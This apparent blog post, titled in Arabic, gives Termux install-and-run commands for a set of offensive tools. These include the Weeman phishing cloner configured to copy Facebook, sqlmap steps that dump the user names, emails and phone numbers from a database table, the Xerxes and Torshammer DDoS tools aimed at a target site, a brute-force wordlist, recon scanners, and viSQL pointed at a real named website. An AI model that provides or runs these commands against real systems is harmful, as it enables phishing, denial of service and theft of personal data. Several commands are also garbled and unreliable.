تثبيت بعض الادوات في termux



اوامر تثبيت بعض الادوات في termux

Termux hacking tools
Date: November 5, 2017
Author: Arif-Tech
0 Comments
WEEMAN [✓]
apt update && apt upgrade -y
apt install git -y
apt install python2 -y
git clone https://github.com/evait-security/weeman
cd weeman
chmod 777 weeman.py
python2 weeman.py
Ex
set url http://facebook.com
set action_url http://facebook.com
run
___________________________________________
Hunner framework
apt update
apt install python
apt install git -y
git clone https://github.com/b3-v3r/Hunner
cd Hunner
chmod 777 hunner.py
python hunner.py
___________________________________________
SQLMAP [✓]
apt update
apt install python
apt install python2
apt install git
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
Python2 sqlmap.py
_______
Exemplo
Python2 sqlmap.py -u website –dbs
-D acuart –tables
-D acuart -T users –columns
-D acuart -T users -C name,email,phone -dump
___________________________________
DDOS XERXES [✓]
apt install git
apt install clang
git clone https://github.com/zanyarjamal/xerxes
cd xerxes
clang xerxes.c -o xerxes
./xerxes website 80
___________________________________
DDOS TORSHAMMER [✓]
apt-get update
apt-get install python2
apt-get install tor
apt-get install git
git clone https://github.com/dotfighter/torshammer.git
Tor
cd torshammer
python2 torshammer.py -T -t website
___________________________________
BRUTEFORCE [✓]
apt update
apt upgrade
apt install python
apt install pip
pip install wordlist
apt install worlist
Wordlist -h
cd /sdcard
Cat pas.txt
___________________________________
Localizar ip
Apt install python git
git clone https://github.com/maldevel/IPGeoLocation.git
cd IPGeoLocation
chmod +x ipgeoLocation.py
pip install -r requirements.txt
python ipgeolocation.py -m
python ipgeolocation.py -t http://www.google.com
___________________________________
Hecker RECONDOG
apt update
apt install python python2
apt install git
git clone https://github.com/UltimateHackers/ReconDog
cd ReconDog
chmod +x dog.py
Python2 dog.py
___________________________________
BUSCA PAINEL ADM DE SITE
pkg install git
git clone https://github.com/Techzindia/admin_penal
cd admin_penal
chmod +x admin_panel_finder.py
python2 admin_panel_finder.py
___________________________________
HAKKU
apt install python
apt install git
mkdir vasu
git clone https://github.com/4shadoww/hakkuframework
cd hakkuframework
chmod +x hakku
python hakku
show modules
use whois
show options
set target examplesite.com
run
___________________________________________
RED HAWK
apt update
apt install git
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
chmod +x rhawk.php
apt install php
ls
php rhawk.php
___________________________________________
D-TECT
apt update
apt install git
git clone https://github.com/shawarkhanethicalhacker/D-TECT
cd D-TECT
apt install python2
chmod +x d-tect.py
python2 d-tect.py
examplesite.com
___________________________________________
viSQL
apt update
apt install python2
apt install git
git clone https://github.com/blackvkng/viSQL
cd viSQL
python2 -m pip install -r requirements.txt
python2 viSQL.py
python2 viSQL.py -t http://www.bible-history.com
__________________
Hash Buster
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/UltimateHackers/Hash-Buster
cd Hash-Buster
python2 hash.py

0 تعليقات